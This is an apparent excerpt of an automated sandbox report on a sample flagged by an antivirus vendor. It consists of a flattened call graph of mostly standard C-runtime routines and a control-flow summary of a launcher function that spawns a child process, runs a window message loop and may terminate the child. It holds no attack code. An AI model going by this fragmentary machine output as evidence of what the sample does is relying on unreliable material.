19984->19985 19986 7ff7ead27c93 19984->19986 19987 7ff7ead1d5fc _fread_nolock 12 API calls 19985->19987 19988 7ff7ead27c98 19986->19988 19994 7ff7ead27c9f _set_fmode 19986->19994 19992 7ff7ead27c91 19987->19992 19989 7ff7ead1a948 __free_lconv_num 11 API calls 19988->19989 19989->19992 19990 7ff7ead27cd2 HeapReAlloc 19990->19992 19990->19994 19991 7ff7ead27ca5 19993 7ff7ead14f08 _set_fmode 11 API calls 19991->19993 19992->19640 19993->19992 19994->19990 19994->19991 19995 7ff7ead23590 _set_fmode 2 API calls 19994->19995 19995->19994 19997 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19996->19997 19998 7ff7ead1ef44 19997->19998 19998->19645 20000 7ff7ead154fa 19999->20000 20001 7ff7ead154d6 19999->20001 20002 7ff7ead154ff 20000->20002 20003 7ff7ead15554 20000->20003 20005 7ff7ead1a948 __free_lconv_num 11 API calls 20001->20005 20008 7ff7ead154e5 20001->20008 20006 7ff7ead15514 20002->20006 20002->20008 20009 7ff7ead1a948 __free_lconv_num 11 API calls 20002->20009 20004 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 20003->20004 20016 7ff7ead15570 20004->20016 20005->20008 20010 7ff7ead1d5fc _fread_nolock 12 API calls 20006->20010 20007 7ff7ead15577 GetLastError 20011 7ff7ead14e7c _fread_nolock 11 API calls 20007->20011 20008->19648 20008->19649 20009->20006 20010->20008 20014 7ff7ead15584 20011->20014 20012 7ff7ead155b2 20012->20008 20013 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 20012->20013 20017 7ff7ead155f6 20013->20017 20018 7ff7ead14f08 _set_fmode 11 API calls 20014->20018 20015 7ff7ead155a5 20020 7ff7ead1d5fc _fread_nolock 12 API calls 20015->20020 20016->20007 20016->20012 20016->20015 20019 7ff7ead1a948 __free_lconv_num 11 API calls 20016->20019 20017->20007 20017->20008 20018->20008 20019->20015 20020->20012 20022 7ff7ead19225 20021->20022 20033 7ff7ead19221 20021->20033 20042 7ff7ead22a3c GetEnvironmentStringsW 20022->20042 20025 7ff7ead1923e 20049 7ff7ead1938c 20025->20049 20026 7ff7ead19232 20027 7ff7ead1a948 __free_lconv_num 11 API calls 20026->20027 20027->20033 20030 7ff7ead1a948 __free_lconv_num 11 API calls 20031 7ff7ead19265 20030->20031 20032 7ff7ead1a948 __free_lconv_num 11 API calls 20031->20032 20032->20033 20033->19677 20034 7ff7ead195cc 20033->20034 20035 7ff7ead195ef 20034->20035 20040 7ff7ead19606 20034->20040 20035->19677 20036 7ff7ead1f8a0 MultiByteToWideChar _fread_nolock 20036->20040 20037 7ff7ead1eb98 _set_fmode 11 API calls 20037->20040 20038 7ff7ead1967a 20039 7ff7ead1a948 __free_lconv_num 11 API calls 20038->20039 20039->20035 20040->20035 20040->20036 20040->20037 20040->20038 20041 7ff7ead1a948 __free_lconv_num 11 API calls 20040->20041 20041->20040 20043 7ff7ead22a60 20042->20043 20044 7ff7ead1922a 20042->20044 20045 7ff7ead1d5fc _fread_nolock 12 API calls 20043->20045 20044->20025 20044->20026 20046 7ff7ead22a97 memcpy_s 20045->20046 20047 7ff7ead1a948 __free_lconv_num 11 API calls 20046->20047 20048 7ff7ead22ab7 FreeEnvironmentStringsW 20047->20048 20048->20044 20050 7ff7ead193b4 20049->20050 20051 7ff7ead1eb98 _set_fmode 11 API calls 20050->20051 20062 7ff7ead193ef 20051->20062 20052 7ff7ead193f7 20053 7ff7ead1a948 __free_lconv_num 11 API calls 20052->20053 20054 7ff7ead19246 20053->20054 20054->20030 20055 7ff7ead19471 20056 7ff7ead1a948 __free_lconv_num 11 API calls 20055->20056 20056->20054 20057 7ff7ead1eb98 _set_fmode 11 API calls 20057->20062 20058 7ff7ead19460 20060 7ff7ead194a8 11 API calls 20058->20060 20059 7ff7ead20474 37 API calls 20059->20062 20061 7ff7ead19468 20060->20061 20064 7ff7ead1a948 __free_lconv_num 11 API calls 20061->20064 20062->20052 20062->20055 20062->20057 20062->20058 20062->20059 20063 7ff7ead19494 20062->20063 20066 7ff7ead1a948 __free_lconv_num 11 API calls 20062->20066 20065 7ff7ead1a900 _isindst 17 API calls 20063->20065 20064->20052 20067 7ff7ead194a6 20065->20067 20066->20062 20069 7ff7ead28b31 __crtLCMapStringW 20068->20069 20070 7ff7ead270ee 20069->20070 20071 7ff7ead1ef68 6 API calls 20069->20071 20070->19702 20070->19704 20071->20070 19061 7ff7ead1afd0 19062 7ff7ead1afea 19061->19062 19063 7ff7ead1afd5 19061->19063 19067 7ff7ead1aff0 19063->19067 19068 7ff7ead1b032 19067->19068 19071 7ff7ead1b03a 19067->19071 19069 7ff7ead1a948 __free_lconv_num 11 API calls 19068->19069 19069->19071 19070 7ff7ead1a948 __free_lconv_num 11 API calls 19072 7ff7ead1b047 19070->19072 19071->19070 19073 7ff7ead1a948 __free_lconv_num 11 API calls 19072->19073 19074 7ff7ead1b054 19073->19074 19075 7ff7ead1a948 __free_lconv_num 11 API calls 19074->19075 19076 7ff7ead1b061 19075->19076 19077 7ff7ead1a948 __free_lconv_num 11 API calls 19076->19077 19078 7ff7ead1b06e 19077->19078 19079 7ff7ead1a948 __free_lconv_num 11 API calls 19078->19079 19080 7ff7ead1b07b 19079->19080 19081 7ff7ead1a948 __free_lconv_num 11 API calls 19080->19081 19082 7ff7ead1b088 19081->19082 19083 7ff7ead1a948 __free_lconv_num 11 API calls 19082->19083 19084 7ff7ead1b095 19083->19084 19085 7ff7ead1a948 __free_lconv_num 11 API calls 19084->19085 19086 7ff7ead1b0a5 19085->19086 19087 7ff7ead1a948 __free_lconv_num 11 API calls 19086->19087 19088 7ff7ead1b0b5 19087->19088 19093 7ff7ead1ae94 19088->19093 19107 7ff7ead202d8 EnterCriticalSection 19093->19107 19248 7ff7ead19d50 19251 7ff7ead19ccc 19248->19251 19258 7ff7ead202d8 EnterCriticalSection 19251->19258 19262 7ff7ead0cb50 19263 7ff7ead0cb60 19262->19263 19279 7ff7ead19ba8 19263->19279 19265 7ff7ead0cb6c 19285 7ff7ead0ce48 19265->19285 19267 7ff7ead0cb84 _RTC_Initialize 19277 7ff7ead0cbd9 19267->19277 19290 7ff7ead0cff8 19267->19290 19268 7ff7ead0d12c 7 API calls 19269 7ff7ead0cc05 19268->19269 19271 7ff7ead0cb99 19293 7ff7ead19014 19271->19293 19277->19268 19278 7ff7ead0cbf5 19277->19278 19280 7ff7ead19bb9 19279->19280 19281 7ff7ead19bc1 19280->19281 19282 7ff7ead14f08 _set_fmode 11 API calls 19280->19282 19281->19265 19283 7ff7ead19bd0 19282->19283 19284 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19283->19284 19284->19281 19286 7ff7ead0ce59 19285->19286 19289 7ff7ead0ce5e __scrt_acquire_startup_lock 19285->19289 19287 7ff7ead0d12c 7 API calls 19286->19287 19286->19289 19288 7ff7ead0ced2 19287->19288 19289->19267 19318 7ff7ead0cfbc 19290->19318 19292 7ff7ead0d001 19292->19271 19294 7ff7ead19034 19293->19294 19301 7ff7ead0cba5 19293->19301 19295 7ff7ead1903c 19294->19295 19296 7ff7ead19052 GetModuleFileNameW 19294->19296 19297 7ff7ead14f08 _set_fmode 11 API calls 19295->19297 19300 7ff7ead1907d 19296->19300 19298 7ff7ead19041 19297->19298 19299 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19298->19299 19299->19301 19333 7ff7ead18fb4 19300->19333 19301->19277 19317 7ff7ead0d0cc InitializeSListHead 19301->19317 19304 7ff7ead190c5 19305 7ff7ead14f08 _set_fmode 11 API calls 19304->19305 19306 7ff7ead190ca 19305->19306 19309 7ff7ead1a948 __free_lconv_num 11 API calls 19306->19309 19307 7ff7ead190ff 19310 7ff7ead1a948 __free_lconv_num 11 API calls 19307->19310 19308 7ff7ead190dd 19308->19307 19311 7ff7ead1912b 19308->19311 19312 7ff7ead19144 19308->19312 19309->19301 19310->19301 19313 7ff7ead1a948 __free_lconv_num 11 API calls 19311->19313 19314 7ff7ead1a948 __free_lconv_num 11 API calls 19312->19314 19315 7ff7ead19134 19313->19315 19314->19307 19316 7ff7ead1a948 __free_lconv_num 11 API calls 19315->19316 19316->19301 19319 7ff7ead0cfd6 19318->19319 19321 7ff7ead0cfcf 19318->19321 19322 7ff7ead1a1ec 19319->19322 19321->19292 19325 7ff7ead19e28 19322->19325 19332 7ff7ead202d8 EnterCriticalSection 19325->19332 19334 7ff7ead19004 19333->19334 19335 7ff7ead18fcc 19333->19335 19334->19304 19334->19308 19335->19334 19336 7ff7ead1eb98 _set_fmode 11 API calls 19335->19336 19337 7ff7ead18ffa 19336->19337 19338 7ff7ead1a948 __free_lconv_num 11 API calls 19337->19338 19338->19334 19339 7ff7ead1c520 19350 7ff7ead202d8 EnterCriticalSection 19339->19350 15899 7ff7ead15628 15900 7ff7ead1565f 15899->15900 15901 7ff7ead15642 15899->15901 15900->15901 15903 7ff7ead15672 CreateFileW 15900->15903 15924 7ff7ead14ee8 15901->15924 15905 7ff7ead156dc 15903->15905 15906 7ff7ead156a6 15903->15906 15959 7ff7ead15c04 15905->15959 15933 7ff7ead1577c GetFileType 15906->15933 15913 7ff7ead15710 15985 7ff7ead159c4 15913->15985 15914 7ff7ead156e5 15980 7ff7ead14e7c 15914->15980 15916 7ff7ead156bb CloseHandle 15919 7ff7ead1565a 15916->15919 15917 7ff7ead156d1 CloseHandle 15917->15919 15923 7ff7ead156ef 15923->15919 16002 7ff7ead1b2c8 GetLastError 15924->16002 15926 7ff7ead14ef1 15927 7ff7ead14f08 15926->15927 15928 7ff7ead1b2c8 _set_fmode 11 API calls 15927->15928 15929 7ff7ead14f11 15928->15929 15930 7ff7ead1a8e0 15929->15930 16060 7ff7ead1a778 15930->16060 15932 7ff7ead1a8f9 15932->15919 15934 7ff7ead15887 15933->15934 15935 7ff7ead157ca 15933->15935 15937 7ff7ead1588f 15934->15937 15938 7ff7ead158b1 15934->15938 15936 7ff7ead157f6 GetFileInformationByHandle 15935->15936 15940 7ff7ead15b00 21 API calls 15935->15940 15941 7ff7ead1581f 15936->15941 15942 7ff7ead158a2 GetLastError 15936->15942 15937->15942 15943 7ff7ead15893 15937->15943 15939 7ff7ead158d4 PeekNamedPipe 15938->15939 15957 7ff7ead15872 15938->15957 15939->15957 15948 7ff7ead157e4 15940->15948 15945 7ff7ead159c4 51 API calls 15941->15945 15944 7ff7ead14e7c _fread_nolock 11 API calls 15942->15944 15946 7ff7ead14f08 _set_fmode 11 API calls 15943->15946 15944->15957 15949 7ff7ead1582a 15945->15949 15946->15957 15947 7ff7ead0c550 _log10_special 8 API calls 15950 7ff7ead156b4 15947->15950 15948->15936 15948->15957 16126 7ff7ead15924 15949->16126 15950->15916 15950->15917 15953 7ff7ead15924 10 API calls 15954 7ff7ead15849 15953->15954 15955 7ff7ead15924 10 API calls 15954->15955 15956 7ff7ead1585a 15955->15956 15956->15957 15958 7ff7ead14f08 _set_fmode 11 API calls 15956->15958 15957->15947 15958->15957 15960 7ff7ead15c3a 15959->15960 15961 7ff7ead14f08 _set_fmode 11 API calls 15960->15961 15979 7ff7ead15cd2 __vcrt_freefls 15960->15979 15963 7ff7ead15c4c 15961->15963 15962 7ff7ead0c550 _log10_special 8 API calls 15964 7ff7ead156e1 15962->15964 15965 7ff7ead14f08 _set_fmode 11 API calls 15963->15965 15964->15913 15964->15914 15966 7ff7ead15c54 15965->15966 16133 7ff7ead17e08 15966->16133 15968 7ff7ead15c69 15969 7ff7ead15c7b 15968->15969 15970 7ff7ead15c71 15968->15970 15972 7ff7ead14f08 _set_fmode 11 API calls 15969->15972 15971 7ff7ead14f08 _set_fmode 11 API calls 15970->15971 15976 7ff7ead15c76 15971->15976 15973 7ff7ead15c80 15972->15973 15974 7ff7ead14f08 _set_fmode 11 API calls 15973->15974 15973->15979 15975 7ff7ead15c8a 15974->15975 15977 7ff7ead17e08 45 API calls 15975->15977 15978 7ff7ead15cc4 GetDriveTypeW 15976->15978 15976->15979 15977->15976 15978->15979 15979->15962 15981 7ff7ead1b2c8 _set_fmode 11 API calls 15980->15981 15982 7ff7ead14e89 __free_lconv_num 15981->15982 15983 7ff7ead1b2c8 _set_fmode 11 API calls 15982->15983 15984 7ff7ead14eab 15983->15984 15984->15923 15987 7ff7ead159ec 15985->15987 15986 7ff7ead1571d 15995 7ff7ead15b00 15986->15995 15987->15986 16227 7ff7ead1f724 15987->16227 15989 7ff7ead15a80 15989->15986 15990 7ff7ead1f724 51 API calls 15989->15990 15991 7ff7ead15a93 15990->15991 15991->15986 15992 7ff7ead1f724 51 API calls 15991->15992 15993 7ff7ead15aa6 15992->15993 15993->15986 15994 7ff7ead1f724 51 API calls 15993->15994 15994->15986 15996 7ff7ead15b1a 15995->15996 15997 7ff7ead15b51 15996->15997 15998 7ff7ead15b2a 15996->15998 15999 7ff7ead1f5b8 21 API calls 15997->15999 16000 7ff7ead14e7c _fread_nolock 11 API calls 15998->16000 16001 7ff7ead15b3a 15998->16001 15999->16001 16000->16001 16001->15923 16003 7ff7ead1b309 FlsSetValue 16002->16003 16009 7ff7ead1b2ec 16002->16009 16004 7ff7ead1b31b 16003->16004 16008 7ff7ead1b2f9 SetLastError 16003->16008 16019 7ff7ead1eb98 16004->16019 16008->15926 16009->16003 16009->16008 16010 7ff7ead1b348 FlsSetValue 16013 7ff7ead1b354 FlsSetValue 16010->16013 16014 7ff7ead1b366 16010->16014 16011 7ff7ead1b338 FlsSetValue 16012 7ff7ead1b341 16011->16012 16026 7ff7ead1a948 16012->16026 16013->16012 16032 7ff7ead1aef4 16014->16032 16024 7ff7ead1eba9 _set_fmode 16019->16024 16020 7ff7ead1ebfa 16023 7ff7ead14f08 _set_fmode 10 API calls 16020->16023 16021 7ff7ead1ebde HeapAlloc 16022 7ff7ead1b32a 16021->16022 16021->16024 16022->16010 16022->16011 16023->16022 16024->16020 16024->16021 16037 7ff7ead23590 16024->16037 16027 7ff7ead1a94d RtlFreeHeap 16026->16027 16028 7ff7ead1a97c 16026->16028 16027->16028 16029 7ff7ead1a968 GetLastError 16027->16029 16028->16008 16030 7ff7ead1a975 __free_lconv_num 16029->16030 16031 7ff7ead14f08 _set_fmode 9 API calls 16030->16031 16031->16028 16046 7ff7ead1adcc 16032->16046 16040 7ff7ead235d0 16037->16040 16045 7ff7ead202d8 EnterCriticalSection 16040->16045 16058 7ff7ead202d8 EnterCriticalSection 16046->16058 16061 7ff7ead1a7a3 16060->16061 16064 7ff7ead1a814 16061->16064 16063 7ff7ead1a7ca 16063->15932 16074 7ff7ead1a55c 16064->16074 16069 7ff7ead1a84f 16069->16063 16075 7ff7ead1a578 GetLastError 16074->16075 16076 7ff7ead1a5b3 16074->16076 16077 7ff7ead1a588 16075->16077 16076->16069 16080 7ff7ead1a5c8 16076->16080 16087 7ff7ead1b390 16077->16087 16081 7ff7ead1a5fc 16080->16081 16082 7ff7ead1a5e4 GetLastError SetLastError 16080->16082 16081->16069 16083 7ff7ead1a900 IsProcessorFeaturePresent 16081->16083 16082->16081 16084 7ff7ead1a913 16083->16084 16104 7ff7ead1a614 16084->16104 16088 7ff7ead1b3ca FlsSetValue 16087->16088 16089 7ff7ead1b3af FlsGetValue 16087->16089 16091 7ff7ead1b3d7 16088->16091 16094 7ff7ead1a5a3 SetLastError 16088->16094 16090 7ff7ead1b3c4 16089->16090 16089->16094 16090->16088 16092 7ff7ead1eb98 _set_fmode 11 API calls 16091->16092 16093 7ff7ead1b3e6 16092->16093 16095 7ff7ead1b404 FlsSetValue 16093->16095 16096 7ff7ead1b3f4 FlsSetValue 16093->16096 16094->16076 16098 7ff7ead1b410 FlsSetValue 16095->16098 16099 7ff7ead1b422 16095->16099 16097 7ff7ead1b3fd 16096->16097 16100 7ff7ead1a948 __free_lconv_num 11 API calls 16097->16100 16098->16097 16101 7ff7ead1aef4 _set_fmode 11 API calls 16099->16101 16100->16094 16102 7ff7ead1b42a 16101->16102 16103 7ff7ead1a948 __free_lconv_num 11 API calls 16102->16103 16103->16094 16105 7ff7ead1a64e _isindst __scrt_get_show_window_mode 16104->16105 16106 7ff7ead1a676 RtlCaptureContext RtlLookupFunctionEntry 16105->16106 16107 7ff7ead1a6b0 RtlVirtualUnwind 16106->16107 16108 7ff7ead1a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16106->16108 16107->16108 16109 7ff7ead1a738 _isindst 16108->16109 16112 7ff7ead0c550 16109->16112 16113 7ff7ead0c559 16112->16113 16114 7ff7ead0c8e0 IsProcessorFeaturePresent 16113->16114 16115 7ff7ead0c564 GetCurrentProcess TerminateProcess 16113->16115 16116 7ff7ead0c8f8 16114->16116 16121 7ff7ead0cad8 RtlCaptureContext 16116->16121 16122 7ff7ead0caf2 RtlLookupFunctionEntry 16121->16122 16123 7ff7ead0cb08 RtlVirtualUnwind 16122->16123 16124 7ff7ead0c90b 16122->16124 16123->16122 16123->16124 16125 7ff7ead0c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16124->16125 16127 7ff7ead1594d FileTimeToSystemTime 16126->16127 16128 7ff7ead15940 16126->16128 16129 7ff7ead15948 16127->16129 16130 7ff7ead15961 SystemTimeToTzSpecificLocalTime 16127->16130 16128->16127 16128->16129 16131 7ff7ead0c550 _log10_special 8 API calls 16129->16131 16130->16129 16132 7ff7ead15839 16131->16132 16132->15953 16134 7ff7ead17e92 16133->16134 16135 7ff7ead17e24 16133->16135 16170 7ff7ead207c0 16134->16170 16135->16134 16136 7ff7ead17e29 16135->16136 16138 7ff7ead17e5e 16136->16138 16139 7ff7ead17e41 16136->16139 16153 7ff7ead17c4c GetFullPathNameW 16138->16153 16145 7ff7ead17bd8 GetFullPathNameW 16139->16145 16144 7ff7ead17e56 __vcrt_freefls 16144->15968 16146 7ff7ead17bfe GetLastError 16145->16146 16147 7ff7ead17c14 16145->16147 16148 7ff7ead14e7c _fread_nolock 11 API calls 16146->16148 16150 7ff7ead14f08 _set_fmode 11 API calls 16147->16150 16152 7ff7ead17c10 16147->16152 16149 7ff7ead17c0b 16148->16149 16151 7ff7ead14f08 _set_fmode 11 API calls 16149->16151 16150->16152 16151->16152 16152->16144 16154 7ff7ead17c7f GetLastError 16153->16154 16159 7ff7ead17c95 __vcrt_freefls 16153->16159 16155 7ff7ead14e7c _fread_nolock 11 API calls 16154->16155 16156 7ff7ead17c8c 16155->16156 16157 7ff7ead14f08 _set_fmode 11 API calls 16156->16157 16158 7ff7ead17c91 16157->16158 16161 7ff7ead17d24 16158->16161 16159->16158 16160 7ff7ead17cef GetFullPathNameW 16159->16160 16160->16154 16160->16158 16164 7ff7ead17d98 memcpy_s 16161->16164 16165 7ff7ead17d4d __scrt_get_show_window_mode 16161->16165 16162 7ff7ead17d81 16163 7ff7ead14f08 _set_fmode 11 API calls 16162->16163 16169 7ff7ead17d86 16163->16169 16164->16144 16165->16162 16165->16164 16167 7ff7ead17dba 16165->16167 16166 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16166->16164 16167->16164 16168 7ff7ead14f08 _set_fmode 11 API calls 16167->16168 16168->16169 16169->16166 16173 7ff7ead205d0 16170->16173 16174 7ff7ead205fb 16173->16174 16175 7ff7ead20612 16173->16175 16178 7ff7ead14f08 _set_fmode 11 API calls 16174->16178 16176 7ff7ead20637 16175->16176 16177 7ff7ead20616 16175->16177 16211 7ff7ead1f5b8 16176->16211 16199 7ff7ead2073c 16177->16199 16181 7ff7ead20600 16178->16181 16185 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16181->16185 16183 7ff7ead2063c 16188 7ff7ead206e1 16183->16188 16194 7ff7ead20663 16183->16194 16184 7ff7ead2061f 16186 7ff7ead14ee8 _fread_nolock 11 API calls 16184->16186 16195 7ff7ead2060b __vcrt_freefls 16185->16195 16187 7ff7ead20624 16186->16187 16191 7ff7ead14f08 _set_fmode 11 API calls 16187->16191 16188->16174 16189 7ff7ead206e9 16188->16189 16192 7ff7ead17bd8 13 API calls 16189->16192 16190 7ff7ead0c550 _log10_special 8 API calls 16193 7ff7ead20731 16190->16193 16191->16181 16192->16195 16193->16144 16196 7ff7ead17c4c 14 API calls 16194->16196 16195->16190 16197 7ff7ead206a7 16196->16197 16197->16195 16198 7ff7ead17d24 37 API calls 16197->16198 16198->16195 16200 7ff7ead20786 16199->16200 16201 7ff7ead20756 16199->16201 16203 7ff7ead20771 16200->16203 16204 7ff7ead20791 GetDriveTypeW 16200->16204 16202 7ff7ead14ee8 _fread_nolock 11 API calls 16201->16202 16205 7ff7ead2075b 16202->16205 16207 7ff7ead0c550 _log10_special 8 API calls 16203->16207 16204->16203 16206 7ff7ead14f08 _set_fmode 11 API calls 16205->16206 16208 7ff7ead20766 16206->16208 16209 7ff7ead2061b 16207->16209 16210 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16208->16210 16209->16183 16209->16184 16210->16203 16225 7ff7ead2a4d0 16211->16225 16213 7ff7ead1f5ee GetCurrentDirectoryW 16214 7ff7ead1f62c 16213->16214 16215 7ff7ead1f605 16213->16215 16216 7ff7ead1eb98 _set_fmode 11 API calls 16214->16216 16217 7ff7ead0c550 _log10_special 8 API calls 16215->16217 16218 7ff7ead1f63b 16216->16218 16219 7ff7ead1f699 16217->16219 16220 7ff7ead1f654 16218->16220 16221 7ff7ead1f645 GetCurrentDirectoryW 16218->16221 16219->16183 16223 7ff7ead14f08 _set_fmode 11 API calls 16220->16223 16221->16220 16222 7ff7ead1f659 16221->16222 16224 7ff7ead1a948 __free_lconv_num 11 API calls 16222->16224 16223->16222 16224->16215 16226 7ff7ead2a4c0 16225->16226 16226->16213 16226->16226 16228 7ff7ead1f755 16227->16228 16229 7ff7ead1f731 16227->16229 16231 7ff7ead1f78f 16228->16231 16234 7ff7ead1f7ae 16228->16234 16229->16228 16230 7ff7ead1f736 16229->16230 16232 7ff7ead14f08 _set_fmode 11 API calls 16230->16232 16233 7ff7ead14f08 _set_fmode 11 API calls 16231->16233 16235 7ff7ead1f73b 16232->16235 16236 7ff7ead1f794 16233->16236 16244 7ff7ead14f4c 16234->16244 16238 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16235->16238 16239 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 16236->16239 16240 7ff7ead1f746 16238->16240 16241 7ff7ead1f79f 16239->16241 16240->15989 16241->15989 16242 7ff7ead1f7bb 16242->16241 16243 7ff7ead204dc 51 API calls 16242->16243 16243->16242 16245 7ff7ead14f70 16244->16245 16246 7ff7ead14f6b 16244->16246 16245->16246 16252 7ff7ead1b150 GetLastError 16245->16252 16246->16242 16253 7ff7ead1b191 FlsSetValue 16252->16253 16254 7ff7ead1b174 FlsGetValue 16252->16254 16256 7ff7ead1b1a3 16253->16256 16272 7ff7ead1b181 16253->16272 16255 7ff7ead1b18b 16254->16255 16254->16272 16255->16253 16258 7ff7ead1eb98 _set_fmode 11 API calls 16256->16258 16257 7ff7ead1b1fd SetLastError 16259 7ff7ead14f8b 16257->16259 16260 7ff7ead1b21d 16257->16260 16261 7ff7ead1b1b2 16258->16261 16274 7ff7ead1d984 16259->16274 16282 7ff7ead1a504 16260->16282 16263 7ff7ead1b1d0 FlsSetValue 16261->16263 16264 7ff7ead1b1c0 FlsSetValue 16261->16264 16267 7ff7ead1b1dc FlsSetValue 16263->16267 16268 7ff7ead1b1ee 16263->16268 16266 7ff7ead1b1c9 16264->16266 16270 7ff7ead1a948 __free_lconv_num 11 API calls 16266->16270 16267->16266 16269 7ff7ead1aef4 _set_fmode 11 API calls 16268->16269 16271 7ff7ead1b1f6 16269->16271 16270->16272 16273 7ff7ead1a948 __free_lconv_num 11 API calls 16271->16273 16272->16257 16273->16257 16275 7ff7ead1d999 16274->16275 16276 7ff7ead14fae 16274->16276 16275->16276 16326 7ff7ead23304 16275->16326 16278 7ff7ead1d9f0 16276->16278 16279 7ff7ead1da18 16278->16279 16280 7ff7ead1da05 16278->16280 16279->16246 16280->16279 16339 7ff7ead22650 16280->16339 16291 7ff7ead23650 16282->16291 16317 7ff7ead23608 16291->16317 16322 7ff7ead202d8 EnterCriticalSection 16317->16322 16327 7ff7ead1b150 __GetCurrentState 45 API calls 16326->16327 16328 7ff7ead23313 16327->16328 16329 7ff7ead2335e 16328->16329 16338 7ff7ead202d8 EnterCriticalSection 16328->16338 16329->16276 16340 7ff7ead1b150 __GetCurrentState 45 API calls 16339->16340 16341 7ff7ead22659 16340->16341 20212 7ff7ead216b0 20223 7ff7ead273e4 20212->20223 20224 7ff7ead273f1 20223->20224 20225 7ff7ead1a948 __free_lconv_num 11 API calls 20224->20225 20226 7ff7ead2740d 20224->20226 20225->20224 20227 7ff7ead1a948 __free_lconv_num 11 API calls 20226->20227 20228 7ff7ead216b9 20226->20228 20227->20226 20229 7ff7ead202d8 EnterCriticalSection 20228->20229

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF7EAD089E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff7ead089e0-7ff7ead08b26 call 7ff7ead0c850 call 7ff7ead09390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7ead153f0 call 7ff7ead1a47c call 7ff7ead1871c call 7ff7ead153f0 call 7ff7ead1a47c call 7ff7ead1871c call 7ff7ead153f0 call 7ff7ead1a47c call 7ff7ead1871c GetCommandLineW CreateProcessW 23 7ff7ead08b28-7ff7ead08b48 GetLastError call 7ff7ead02c50 0->23 24 7ff7ead08b4d-7ff7ead08b89 RegisterClassW 0->24 32 7ff7ead08e39-7ff7ead08e5f call 7ff7ead0c550 23->32 26 7ff7ead08b8b GetLastError 24->26 27 7ff7ead08b91-7ff7ead08be5 CreateWindowExW 24->27 26->27 29 7ff7ead08be7-7ff7ead08bed GetLastError 27->29 30 7ff7ead08bef-7ff7ead08bf4 ShowWindow 27->30 31 7ff7ead08bfa-7ff7ead08c0a WaitForSingleObject 29->31 30->31 33 7ff7ead08c88-7ff7ead08c8f 31->33 34 7ff7ead08c0c 31->34 37 7ff7ead08c91-7ff7ead08ca1 WaitForSingleObject 33->37 38 7ff7ead08cd2-7ff7ead08cd9 33->38 36 7ff7ead08c10-7ff7ead08c13 34->36 40 7ff7ead08c1b-7ff7ead08c22 36->40 41 7ff7ead08c15 GetLastError 36->41 42 7ff7ead08ca7-7ff7ead08cb7 TerminateProcess 37->42 43 7ff7ead08df8-7ff7ead08e02 37->43 44 7ff7ead08cdf-7ff7ead08cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->44 45 7ff7ead08dc0-7ff7ead08dd9 GetMessageW 38->45 40->37 46 7ff7ead08c24-7ff7ead08c41 PeekMessageW 40->46 41->40 51 7ff7ead08cb9 GetLastError 42->51 52 7ff7ead08cbf-7ff7ead08ccd WaitForSingleObject 42->52 49 7ff7ead08e11-7ff7ead08e35 GetExitCodeProcess CloseHandle * 2 43->49 50 7ff7ead08e04-7ff7ead08e0a DestroyWindow 43->50 53 7ff7ead08d00-7ff7ead08d38 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff7ead08ddb-7ff7ead08de9 TranslateMessage DispatchMessageW 45->47 48 7ff7ead08def-7ff7ead08df6 45->48 56 7ff7ead08c43-7ff7ead08c74 TranslateMessage DispatchMessageW PeekMessageW 46->56 57 7ff7ead08c76-7ff7ead08c86 WaitForSingleObject 46->57 47->48 48->43 48->45 49->32 50->49 51->52 52->43 54 7ff7ead08d3a 53->54 55 7ff7ead08d73-7ff7ead08d7a 53->55 58 7ff7ead08d40-7ff7ead08d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->45 59 7ff7ead08d7c-7ff7ead08da5 QueryPerformanceCounter 55->59 56->56 56->57 57->33 57->36 58->55 58->58 59->53 60 7ff7ead08dab-7ff7ead08db2 59->60 60->43 61 7ff7ead08db4-7ff7ead08db8 60->61 61->45
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
